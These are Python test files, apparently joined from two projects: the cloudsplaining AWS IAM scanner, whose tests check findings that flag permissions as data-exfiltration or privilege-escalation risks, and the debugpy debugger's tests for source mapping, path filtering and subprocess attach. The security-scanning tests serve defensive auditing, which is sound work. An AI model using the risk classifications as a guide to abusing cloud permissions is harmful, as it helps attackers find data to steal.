"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumeRolePolicyDocument": None,
"AssumableByComputeService": [],
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": []
},
{
"AccountID": "123456789012",
"ManagedBy": "Customer",
"Name": "SomeUser",
"PolicyName": "MyPolicy",
"Type": "User",
"Arn": "arn:aws:iam::123456789012:user/SomeUser",
'AttachedToPrincipal': "SomeUser",
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumeRolePolicyDocument": None,
"AssumableByComputeService": [],
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": []
},
{
"AccountID": "123456789012",
"ManagedBy": "Customer",
"Name": "SomeGroup",
"PolicyName": "MyPolicy",
"Type": "Group",
"Arn": "arn:aws:iam::123456789012:group/SomeGroup",
'AttachedToPrincipal': "SomeGroup",
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumeRolePolicyDocument": None,
"AssumableByComputeService": [],
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": []
},
{
"AccountID": "123456789012",
"ManagedBy": "Customer",
"Name": "SomeRole",
"PolicyName": "MyPolicy",
"Type": "Role",
"Arn": "arn:aws:iam::123456789012:role/SomeRole",
'AttachedToPrincipal': "SomeRole",
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"sts:AssumeRole"
],
"Principal": {
"Service": "ecs-tasks.amazonaws.com",
"AWS": "arn:aws:iam::012345678910:root"
}
}
]
},
"AssumableByComputeService": [
"ecs-tasks"
],
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": []
}
]
# print(json.dumps(all_findings.json, indent=4))
self.maxDiff = None
self.assertListEqual(results, expected_results)
class TestNewFinding(unittest.TestCase):
def test_principal_findings(self):
"""output.new_findings.UserFinding"""
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
# (1) If the user is a member of an excluded group, return True
exclusions_cfg = dict(
users=["obama"],
groups=["admin"],
roles=["MyRole"],
policies=["AWSLambdaFullAccess"]
)
exclusions = Exclusions(exclusions_cfg)
user_finding = UserFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:user/SomeUser",
actions=["s3:GetObject"],
policy_document=policy_document,
group_membership=["admin"],
exclusions=exclusions
)
result = user_finding.is_excluded(exclusions)
expected_result = ["admin"]
self.assertListEqual(result, expected_result)
# (2) If the user is explicitly excluded, return True
exclusions = Exclusions(exclusions_cfg)
user_finding = UserFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:user/obama", # Obama is excluded
actions=["s3:GetObject"],
policy_document=policy_document,
group_membership=["not-excluded-group"],
exclusions=exclusions
)
result = user_finding.is_excluded(exclusions)
expected_result = ["obama"]
self.assertListEqual(result, expected_result)
# (3) If the policy attached is excluded
user_finding = UserFinding(
policy_name="AWSLambdaFullAccess",
arn="arn:aws:iam::123456789012:user/not-excluded-user", # Obama is excluded
actions=["s3:GetObject"],
policy_document=policy_document,
group_membership=["not-excluded-group"],
exclusions=exclusions
)
result = user_finding.is_excluded(exclusions)
expected_result = ["AWSLambdaFullAccess"]
self.assertListEqual(result, expected_result)
def test_group_membership_finding(self):
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
exclusions_cfg = dict(
users=["obama"],
groups=["admin"],
roles=["MyRole"],
policies=["AWSLambdaFullAccess"]
)
exclusions = Exclusions(exclusions_cfg)
group_finding = GroupFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/GroupShouldBeEmpty",
actions=["s3:GetObject"],
policy_document=policy_document,
exclusions=exclusions,
members=["obama"]
)
result = group_finding.is_excluded(exclusions)
self.assertListEqual(result, [])
group_finding = GroupFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/GroupShouldBeEmpty",
actions=["s3:GetObject"],
policy_document=policy_document,
exclusions=exclusions,
members=["yolo"]
)
self.assertFalse(group_finding.is_excluded(exclusions))
def test_policy_action_exclusion_findings(self):
print()
def test_policy_name_finding(self):
"""output.new_findings.PolicyFinding"""
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
exclusions_cfg = dict(
users=["obama"],
groups=["admin"],
roles=["MyRole"],
policies=["AWSLambdaFullAccess"]
)
exclusions = Exclusions(exclusions_cfg)
# (1) If the policy attached is excluded
policy_finding = PolicyFinding(
policy_name="AWSLambdaFullAccess",
arn="arn:aws:iam::aws:policy/AWSLambdaFullAccess", # Obama is excluded
actions=["s3:GetObject"],
policy_document=policy_document,
exclusions=exclusions
)
result = policy_finding.is_excluded(exclusions)
expected_result = ["AWSLambdaFullAccess"]
self.assertListEqual(result, expected_result)
# (2) Non-exclusion
exclusions_cfg = dict(
users=["obama"],
groups=["admin"],
roles=["MyRole"],
policies=["someOtherName"]
)
exclusions = Exclusions(exclusions_cfg)
result = policy_finding.is_excluded(exclusions)
expected_result = False
self.assertEqual(result, expected_result)
def test_finding_attributes(self):
"""scan.findings.new_finding"""
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
finding = Finding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/SNSNotifications",
actions=["s3:GetObject"],
policy_document=policy_document
)
self.assertEqual(finding.account_id, "123456789012")
self.assertEqual(finding.managed_by, "Customer")
self.assertEqual(len(finding.services_affected), 1)
self.assertEqual(len(finding.actions), 1)
self.assertDictEqual(finding.policy_document.json, policy_document.json)
expected_finding_json = {
"AccountID": "123456789012",
"ManagedBy": "Customer",
"Name": "SNSNotifications",
"PolicyName": "MyPolicy",
"Type": "Group",
"Arn": "arn:aws:iam::123456789012:group/SNSNotifications",
"AttachedToPrincipal": None,
"ActionsCount": 1,
"ServicesCount": 1,
"Services": [
"s3"
],
"Actions": [
"s3:GetObject"
],
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
},
"AssumableByComputeService": [],
"AssumeRolePolicyDocument": None,
"PrivilegeEscalation": [],
"DataExfiltrationActions": [
"s3:GetObject"
],
"PermissionsManagementActions": [],
}
print(json.dumps(finding.json, indent=4))
self.maxDiff = None
self.assertDictEqual(finding.json, expected_finding_json)
def test_finding_actions_excluded(self):
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject",
"logs:CreateLogStream",
"logs:PutLogEvents"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
# (1) EXCLUDE actions
exclusions_cfg = {
"users": ["obama"],
"groups": ["admin"],
"roles": ["MyRole"],
"policies": ["someOtherName"],
"exclude-actions": [
"logs:CreateLogStream",
"logs:PutLogEvents"
]
}
exclusions = Exclusions(exclusions_cfg)
finding = Finding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/SNSNotifications",
actions=["s3:GetObject"],
policy_document=policy_document,
exclusions=exclusions
)
# print(finding.actions)
self.assertListEqual(finding.actions, ["s3:GetObject"])
def test_finding_actions_included(self):
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject",
"ec2:DescribeInstances", # This is a bad thing to include, but just for the hell of it
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
# (2) INCLUDE actions
exclusions_cfg = {
"users": ["obama"],
"groups": ["admin"],
"roles": ["MyRole"],
"policies": ["someOtherName"],
"include-actions": [
"ec2:DescribeInstances"
],
"exclude-actions": [
"s3:GetObject",
],
}
exclusions = Exclusions(exclusions_cfg)
finding = Finding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/SNSNotifications",
actions=["s3:GetObject", "ec2:DescribeInstances"],
policy_document=policy_document,
exclusions=exclusions
)
# print(finding.actions)
expected_results = [
"ec2:DescribeInstances",
]
self.assertListEqual(finding.actions, expected_results)
group_finding = GroupFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:group/SNSNotifications",
actions=["s3:GetObject", "ec2:DescribeInstances"],
policy_document=policy_document,
exclusions=exclusions,
members=None
)
self.assertListEqual(group_finding.actions, expected_results)
def test_findings_for_roles_assumable_by_compute_services_ecs_tasks_new(self):
trust_policy_from_compute_service_ecs_tasks = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"sts:AssumeRole"
],
"Principal": {
"Service": "ecs-tasks.amazonaws.com",
"AWS": "arn:aws:iam::012345678910:root",
}
}
]
}
assume_role_policy_document = AssumeRolePolicyDocument(trust_policy_from_compute_service_ecs_tasks)
test_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:GetObject"
],
"Resource": "*"
}
]
}
policy_document = PolicyDocument(test_policy)
finding = Finding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:role/TestComputeService",
actions=["s3:GetObject"],
policy_document=policy_document,
assume_role_policy_document=assume_role_policy_document
)
# print(finding.role_assumable_by_compute_services)
self.assertListEqual(finding.role_assumable_by_compute_services, ["ecs-tasks"])
role_finding = RoleFinding(
policy_name="MyPolicy",
arn="arn:aws:iam::123456789012:role/TestComputeService",
actions=["s3:GetObject"],
policy_document=policy_document,
assume_role_policy_document=assume_role_policy_document
)
self.assertListEqual(role_finding.role_assumable_by_compute_services, ["ecs-tasks"])
```
#### File: test/scanning/test_principal_detail.py
```python
import os
import unittest
import json
from cloudsplaining.scan.principal_detail import PrincipalDetail, PrincipalTypeDetails
example_authz_details_file = os.path.abspath(
os.path.join(
os.path.dirname(__file__),
os.path.pardir,
"files",
"example-authz-details.json",
)
)
with open(example_authz_details_file) as f:
contents = f.read()
auth_details_json = json.loads(contents)
# class TestPrincipalTypeDetails(unittest.TestCase):
#
# def test_principal_type_details(self):
# raw_role_detail_list = auth_details_json.get("RoleDetailList")
# role_detail_list = PrincipalTypeDetails(raw_role_detail_list)
class TestPrincipalDetail(unittest.TestCase):
def test_user_principal(self):
principal_detail = auth_details_json["UserDetailList"][1]
user_principal_detail = PrincipalDetail(principal_detail)
result = user_principal_detail.policy_list[0]["PolicyDocument"].json
expected_result = {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"s3:PutObject",
"s3:PutObjectAcl",
"s3:GetObject"
],
"Resource": [
"*"
]
}
]
}
self.assertDictEqual(result, expected_result)
result = user_principal_detail.policy_list[0]["PolicyName"]
expected_result = "InsecureUserPolicy"
self.assertEqual(result, expected_result)
def test_principal_attributes(self):
"""scan.principals.Principal: Testing Principal simple attributes"""
principal_detail = auth_details_json["UserDetailList"][1]
user_principal_detail = PrincipalDetail(principal_detail)
self.assertEqual(user_principal_detail.name, "userwithlotsofpermissions")
self.assertEqual(user_principal_detail.principal_type, "User")
def test_account_id(self):
"""scan.principals.Principal.account_id"""
principal_detail = auth_details_json["UserDetailList"][1]
user_principal_detail = PrincipalDetail(principal_detail)
self.assertEqual(user_principal_detail.account_id, "012345678901")
def test_group_principal_detail(self):
"""scan.principal_detail.Principal: Testing group"""
principal_detail = {
"Path": "/",
"GroupName": "GOAT",
"GroupId": "GreatestOfAllTime",
"Arn": "arn:aws:iam::012345678901:group/GOAT",
"CreateDate": "2017-05-15 17:33:36+00:00",
"GroupPolicyList": [
{
"PolicyName": "SsmOnboardingInlinePolicy",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"s3:PutObject",
"s3:GetObject"
],
"Resource": "*"
}
]
}
}
],
"AttachedManagedPolicies": [
{
"PolicyName": "AdministratorAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
}
]
}
group_principal_detail = PrincipalDetail(principal_detail)
self.assertEqual(group_principal_detail.policy_list[0]["PolicyName"], "SsmOnboardingInlinePolicy")
self.assertEqual(group_principal_detail.policy_list[0]["PolicyName"], "SsmOnboardingInlinePolicy")
# Group with attached managed policies
expected_result = [
{
"PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess",
"PolicyName": "AdministratorAccess"
}
]
results = group_principal_detail.attached_managed_policies
# print(json.dumps(results, indent=4))
self.assertListEqual(results, expected_result)
class TestPrincipalTrustPolicies(unittest.TestCase):
def test_principal_assume_role_policy_document_json(self):
"""scan.principals.Principal.assume_role_policy_document.json"""
principal_detail = auth_details_json["RoleDetailList"][2]
# print(json.dumps(principal_detail, indent=4))
role_principal_detail = PrincipalDetail(principal_detail)
expected_result = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
# print(json.dumps(role_principal_detail.assume_role_policy_document.json, indent=4))
self.assertDictEqual(role_principal_detail.assume_role_policy_document.json, expected_result)
self.assertDictEqual(role_principal_detail.assume_role_from_compute.json, expected_result)
``` |
{
"source": "jhutchings1/debugpy",
"score": 2
} |
#### File: tests_python/resources/_debugger_case_source_mapping_jmc.py
```python
def full_function():
# Note that this function is not called, it's there just to make the mapping explicit. # map to cell1, line 1
import sys # map to cell1, line 2
frame = sys._getframe() # map to cell1, line 3
if py_db.in_project_scope(frame, '<cell1>') != expect_in_project_scope: # map to cell1, line 4
raise AssertionError('Expected <cell1> to be in project scope: %s' % (expect_in_project_scope,)) # map to cell1, line 5
a = 1 # map to cell1, line 6
b = 2 # map to cell1, line 7
def create_code():
cell1_code = compile(''' # line 1
import sys # line 2
frame = sys._getframe() # line 3
if py_db.in_project_scope(frame, '<cell1>') != expect_in_project_scope: # line 4
raise AssertionError('Expected <cell1> to be in project scope: %s' % (expect_in_project_scope,)) # line 5
a = 1 # line 6
b = 2 # line 7
''', '<cell1>', 'exec')
return {'cell1': cell1_code}
if __name__ == '__main__':
code = create_code()
import pydevd
py_db = pydevd.get_global_debugger()
expect_in_project_scope = True
exec(code['cell1']) # When executing, stop at breakpoint and then remove the source mapping.
expect_in_project_scope = False
exec(code['cell1']) # Should no longer stop.
print('TEST SUCEEDED')
```
#### File: pydevd/tests_python/test_pydevd_filtering.py
```python
from _pydevd_bundle.pydevd_constants import IS_WINDOWS
def test_in_project_roots(tmpdir):
from _pydevd_bundle.pydevd_filtering import FilesFiltering
files_filtering = FilesFiltering()
import os.path
import sys
assert files_filtering._get_library_roots() == [
os.path.normcase(x) for x in files_filtering._get_default_library_roots()]
site_packages = tmpdir.mkdir('site-packages')
project_dir = tmpdir.mkdir('project')
project_dir_inside_site_packages = str(site_packages.mkdir('project'))
site_packages_inside_project_dir = str(project_dir.mkdir('site-packages'))
# Convert from pytest paths to str.
site_packages = str(site_packages)
project_dir = str(project_dir)
tmpdir = str(tmpdir)
# Test permutations of project dir inside site packages and vice-versa.
files_filtering.set_project_roots([project_dir, project_dir_inside_site_packages])
files_filtering.set_library_roots([site_packages, site_packages_inside_project_dir])
check = [
(tmpdir, False),
(site_packages, False),
(site_packages_inside_project_dir, False),
(project_dir, True),
(project_dir_inside_site_packages, True),
]
for (check_path, find) in check[:]:
check.append((os.path.join(check_path, 'a.py'), find))
for check_path, find in check:
assert files_filtering.in_project_roots(check_path) == find
files_filtering.set_project_roots([])
files_filtering.set_library_roots([site_packages, site_packages_inside_project_dir])
# If the IDE did not set the project roots, consider anything not in the site
# packages as being in a project root (i.e.: we can calculate default values for
# site-packages but not for project roots).
check = [
(tmpdir, True),
(site_packages, False),
(site_packages_inside_project_dir, False),
(project_dir, True),
(project_dir_inside_site_packages, False),
('<foo>', False),
('<ipython>', True),
('<frozen importlib._bootstrap>', False),
]
for check_path, find in check:
assert files_filtering.in_project_roots(check_path) == find, \
'Expected: %s to be a part of the project: %s' % (check_path, find)
sys.path.append(str(site_packages))
try:
default_library_roots = files_filtering._get_default_library_roots()
assert len(set(default_library_roots)) == len(default_library_roots), \
'Duplicated library roots found in: %s' % (default_library_roots,)
assert str(site_packages) in default_library_roots
for path in sys.path:
if os.path.exists(path) and path.endswith('site-packages'):
assert path in default_library_roots
finally:
sys.path.remove(str(site_packages))
def test_filtering(tmpdir):
from _pydevd_bundle.pydevd_filtering import FilesFiltering
from _pydevd_bundle.pydevd_filtering import ExcludeFilter
files_filtering = FilesFiltering()
site_packages = tmpdir.mkdir('site-packages')
project_dir = tmpdir.mkdir('project')
project_dir_inside_site_packages = str(site_packages.mkdir('project'))
site_packages_inside_project_dir = str(project_dir.mkdir('site-packages'))
files_filtering.set_exclude_filters([
ExcludeFilter('**/project*', True, True),
ExcludeFilter('**/bar*', False, True),
])
assert files_filtering.exclude_by_filter('/foo/project', None) is True
assert files_filtering.exclude_by_filter('/foo/unmatched', None) is None
assert files_filtering.exclude_by_filter('/foo/bar', None) is False
def test_glob_matching():
from _pydevd_bundle.pydevd_filtering import glob_matches_path
# Linux
for sep, altsep in (('\\', '/'), ('/', None)):
def build(path):
if sep == '/':
return path
else:
return ('c:' + path).replace('/', '\\')
assert glob_matches_path(build('/a'), r'*', sep, altsep)
assert not glob_matches_path(build('/a/b/c/some.py'), '/a/**/c/so?.py', sep, altsep)
assert glob_matches_path('/a/b/c', '/a/b/*')
assert not glob_matches_path('/a/b', '/*')
assert glob_matches_path('/a/b', '/*/b')
assert glob_matches_path('/a/b', '**/*')
assert not glob_matches_path('/a/b', '**/a')
assert glob_matches_path(build('/a/b/c/d'), '**/d', sep, altsep)
assert not glob_matches_path(build('/a/b/c/d'), '**/c', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '**/c/d', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '**/b/c/d', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '/*/b/*/d', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '**/c/*', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '/a/**/c/*', sep, altsep)
assert glob_matches_path(build('/a/b/c/d.py'), '/a/**/c/*', sep, altsep)
assert glob_matches_path(build('/a/b/c/d.py'), '/a/**/c/*.py', sep, altsep)
assert glob_matches_path(build('/a/b/c/some.py'), '/a/**/c/so*.py', sep, altsep)
assert glob_matches_path(build('/a/b/c/some.py'), '/a/**/c/som?.py', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '/**', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), '/**/d', sep, altsep)
assert glob_matches_path(build('/a/b/c/d.py'), '/**/*.py', sep, altsep)
assert glob_matches_path(build('/a/b/c/d.py'), '**/c/*.py', sep, altsep)
if IS_WINDOWS:
assert glob_matches_path(build('/a/b/c/d.py'), '**/C/*.py', sep, altsep)
assert glob_matches_path(build('/a/b/C/d.py'), '**/c/*.py', sep, altsep)
# Expected not to match.
assert not glob_matches_path(build('/a/b/c/d'), '/**/d.py', sep, altsep)
assert not glob_matches_path(build('/a/b/c/d.pyx'), '/a/**/c/*.py', sep, altsep)
assert not glob_matches_path(build('/a/b/c/d'), '/*/d', sep, altsep)
if sep == '/':
assert not glob_matches_path(build('/a/b/c/d'), r'**\d', sep, altsep) # Match with \ doesn't work on linux...
assert not glob_matches_path(build('/a/b/c/d'), r'c:\**\d', sep, altsep) # Match with drive doesn't work on linux...
else:
# Works in Windows.
assert glob_matches_path(build('/a/b/c/d'), r'**\d', sep, altsep)
assert glob_matches_path(build('/a/b/c/d'), r'c:\**\d', sep, altsep)
# Corner cases
assert not glob_matches_path(build('/'), r'', sep, altsep)
assert glob_matches_path(build(''), r'', sep, altsep)
assert not glob_matches_path(build(''), r'**', sep, altsep)
assert glob_matches_path(build('/'), r'**', sep, altsep)
assert glob_matches_path(build('/'), r'*', sep, altsep)
def test_rules_to_exclude_filter(tmpdir):
from _pydevd_bundle.pydevd_process_net_command_json import _convert_rules_to_exclude_filters
from _pydevd_bundle.pydevd_filtering import ExcludeFilter
from random import shuffle
dira = tmpdir.mkdir('a')
dirb = dira.mkdir('b')
fileb = dirb.join('fileb.py')
fileb2 = dirb.join('fileb2.py')
with fileb.open('w') as stream:
stream.write('')
def filename_to_server(filename):
return filename
def on_error(msg):
raise AssertionError(msg)
rules = [
{'path': str(dira), 'include': False},
{'path': str(dirb), 'include': True},
{'path': str(fileb), 'include': True},
{'path': str(fileb2), 'include': True},
{'path': '**/foo/*.py', 'include': True},
{'module': 'bar', 'include': False},
{'module': 'bar.foo', 'include': True},
]
shuffle(rules)
exclude_filters = _convert_rules_to_exclude_filters(rules, filename_to_server, on_error)
assert exclude_filters == [
ExcludeFilter(name=str(fileb2), exclude=False, is_path=True),
ExcludeFilter(name=str(fileb), exclude=False, is_path=True),
ExcludeFilter(name=str(dirb) + '/**', exclude=False, is_path=True),
ExcludeFilter(name=str(dira) + '/**', exclude=True, is_path=True),
ExcludeFilter(name='**/foo/*.py', exclude=False, is_path=True),
ExcludeFilter(name='bar.foo', exclude=False, is_path=False),
ExcludeFilter(name='bar', exclude=True, is_path=False),
]
```
#### File: tests/debugpy/test_multiproc.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest
import sys
import debugpy
import tests
from tests import debug
from tests.debug import runners
from tests.patterns import some
if not tests.full:
@pytest.fixture(params=[runners.launch] + runners.all_attach_socket)
def run(request):
return request.param
def expected_subprocess_config(parent_session):
config = dict(parent_session.config)
for key in "args", "listen", "postDebugTask", "preLaunchTask", "processId":
config.pop(key, None)
config.update(
{
"name": some.str,
"request": "attach",
"subProcessId": some.int,
"connect": {"host": some.str, "port": some.int},
}
)
return config
@pytest.mark.parametrize(
"start_method",
[""]
if sys.version_info < (3,)
else ["spawn"]
if sys.platform == "win32"
else ["spawn", "fork"],
)
def test_multiprocessing(pyfile, target, run, start_method):
if start_method == "spawn" and sys.platform != "win32":
pytest.skip("https://github.com/microsoft/ptvsd/issues/1887")
@pyfile
def code_to_debug():
import debuggee
import multiprocessing
import os
import sys
# https://github.com/microsoft/ptvsd/issues/2108
class Foo(object):
pass
def parent(q, a):
from debuggee import backchannel
debuggee.setup()
print("spawning child")
p = multiprocessing.Process(target=child, args=(q, a))
p.start()
print("child spawned")
q.put("foo?")
foo = a.get()
assert isinstance(foo, Foo), repr(foo)
q.put("child_pid?")
what, child_pid = a.get()
assert what == "child_pid"
backchannel.send(child_pid)
q.put("grandchild_pid?")
what, grandchild_pid = a.get()
assert what == "grandchild_pid"
backchannel.send(grandchild_pid)
assert backchannel.receive() == "continue"
q.put("exit!")
p.join()
def child(q, a):
print("entering child")
assert q.get() == "foo?"
a.put(Foo())
assert q.get() == "child_pid?"
a.put(("child_pid", os.getpid()))
print("spawning child of child")
p = multiprocessing.Process(target=grandchild, args=(q, a))
p.start()
p.join()
print("leaving child")
def grandchild(q, a):
print("entering grandchild")
assert q.get() == "grandchild_pid?"
a.put(("grandchild_pid", os.getpid()))
assert q.get() == "exit!"
print("leaving grandchild")
if __name__ == "__main__":
start_method = sys.argv[1]
if start_method != "":
multiprocessing.set_start_method(start_method)
q = multiprocessing.Queue()
a = multiprocessing.Queue()
try:
parent(q, a)
finally:
q.close()
a.close()
with debug.Session() as parent_session:
parent_backchannel = parent_session.open_backchannel()
with run(parent_session, target(code_to_debug, args=[start_method])):
pass
expected_child_config = expected_subprocess_config(parent_session)
child_config = parent_session.wait_for_next_event("debugpyAttach")
assert child_config == expected_child_config
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
expected_grandchild_config = expected_subprocess_config(child_session)
grandchild_config = child_session.wait_for_next_event("debugpyAttach")
assert grandchild_config == expected_grandchild_config
with debug.Session(grandchild_config) as grandchild_session:
with grandchild_session.start():
pass
parent_backchannel.send("continue")
@pytest.mark.parametrize("subProcess", [True, False, None])
def test_subprocess(pyfile, target, run, subProcess):
@pyfile
def child():
import os
import sys
assert "debugpy" in sys.modules
import debugpy
from debuggee import backchannel
backchannel.send(os.getpid())
backchannel.send(debugpy.__file__)
backchannel.send(sys.argv)
@pyfile
def parent():
import debuggee
import os
import subprocess
import sys
debuggee.setup()
argv = [sys.executable, sys.argv[1], "--arg1", "--arg2", "--arg3"]
env = os.environ.copy()
process = subprocess.Popen(
argv,
env=env,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
process.wait()
with debug.Session() as parent_session:
backchannel = parent_session.open_backchannel()
parent_session.config["preLaunchTask"] = "doSomething"
parent_session.config["postDebugTask"] = "doSomethingElse"
if subProcess is not None:
parent_session.config["subProcess"] = subProcess
with run(parent_session, target(parent, args=[child])):
pass
if subProcess is False:
return
expected_child_config = expected_subprocess_config(parent_session)
child_config = parent_session.wait_for_next_event("debugpyAttach")
assert child_config == expected_child_config
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
child_pid = backchannel.receive()
assert child_pid == child_config["subProcessId"]
assert str(child_pid) in child_config["name"]
debugpy_file = backchannel.receive()
assert debugpy_file == debugpy.__file__
child_argv = backchannel.receive()
assert child_argv == [child, "--arg1", "--arg2", "--arg3"]
def test_autokill(pyfile, target):
@pyfile
def child():
while True:
pass
@pyfile
def parent():
import os
import subprocess
import sys
argv = [sys.executable, sys.argv[1]]
env = os.environ.copy()
subprocess.Popen(
argv,
env=env,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
).wait()
with debug.Session() as parent_session:
parent_session.expected_exit_code = some.int
with parent_session.launch(target(parent, args=[child])):
pass
child_config = parent_session.wait_for_next_event("debugpyAttach")
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
parent_session.request("terminate")
child_session.wait_for_exit()
def test_argv_quoting(pyfile, target, run):
@pyfile
def args():
args = [ # noqa
r"regular",
r"",
r"with spaces" r'"quoted"',
r'" quote at start',
r'quote at end "',
r'quote in " the middle',
r'quotes "in the" middle',
r"\path with\spaces",
r"\path\with\terminal\backslash" + "\\",
r"backslash \" before quote",
]
@pyfile
def parent():
import debuggee
import sys
import subprocess
from args import args
debuggee.setup()
child = sys.argv[1]
subprocess.check_call([sys.executable] + [child] + args)
@pyfile
def child():
import sys
from debuggee import backchannel
from args import args as expected_args
backchannel.send(expected_args)
actual_args = sys.argv[1:]
backchannel.send(actual_args)
with debug.Session() as parent_session:
backchannel = parent_session.open_backchannel()
with run(parent_session, target(parent, args=[child])):
pass
child_config = parent_session.wait_for_next_event("debugpyAttach")
parent_session.proceed()
with debug.Session(child_config) as child_session:
with child_session.start():
pass
expected_args = backchannel.receive()
actual_args = backchannel.receive()
assert expected_args == actual_args
def test_echo_and_shell(pyfile, target, run):
"""
Checks https://github.com/microsoft/ptvsd/issues/1548
"""
@pyfile
def code_to_run():
import debuggee
import sys
import subprocess
import os
debuggee.setup()
if sys.platform == "win32":
args = ["dir", "-c", "."]
else:
args = ["ls", "-c", "-la"]
p = subprocess.Popen(
args,
shell=True,
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
cwd=os.path.dirname(os.path.abspath(__file__)),
)
stdout, _stderr = p.communicate()
if sys.version_info[0] >= 3:
stdout = stdout.decode("utf-8")
if "code_to_run.py" not in stdout:
raise AssertionError(
'Did not find "code_to_run.py" when listing this dir with subprocess. Contents: %s'
% (stdout,)
)
with debug.Session() as parent_session:
with run(parent_session, target(code_to_run)):
pass
```
#### File: tests/debugpy/test_path_mapping.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest
import tests
from tests import debug, test_data
from tests.debug import targets
from tests.patterns import some
if not tests.full:
@pytest.fixture(params=targets.all_named)
def target(request):
return request.param
def test_with_dot_remote_root(pyfile, long_tmpdir, target, run):
@pyfile
def code_to_debug():
import os
import debuggee
from debuggee import backchannel
debuggee.setup()
backchannel.send(os.path.abspath(__file__))
print("done") # @bp
dir_local = long_tmpdir.mkdir("local")
dir_remote = long_tmpdir.mkdir("remote")
path_local = dir_local / "code_to_debug.py"
path_remote = dir_remote / "code_to_debug.py"
code_to_debug.copy(path_local)
code_to_debug.copy(path_remote)
with debug.Session() as session:
session.config["pathMappings"] = [{"localRoot": dir_local, "remoteRoot": "."}]
backchannel = session.open_backchannel()
with run(session, target(path_remote), cwd=dir_remote):
# Set breakpoints using local path. This tests that local paths are
# mapped to remote paths.
session.set_breakpoints(path_local, all)
actual_path_remote = backchannel.receive()
assert some.path(actual_path_remote) == path_remote
session.wait_for_stop(
"breakpoint",
expected_frames=[some.dap.frame(some.dap.source(path_local), line="bp")],
)
session.request_continue()
def test_with_path_mappings(pyfile, long_tmpdir, target, run):
@pyfile
def code_to_debug():
import debuggee
import os
import sys
from debuggee import backchannel
debuggee.setup()
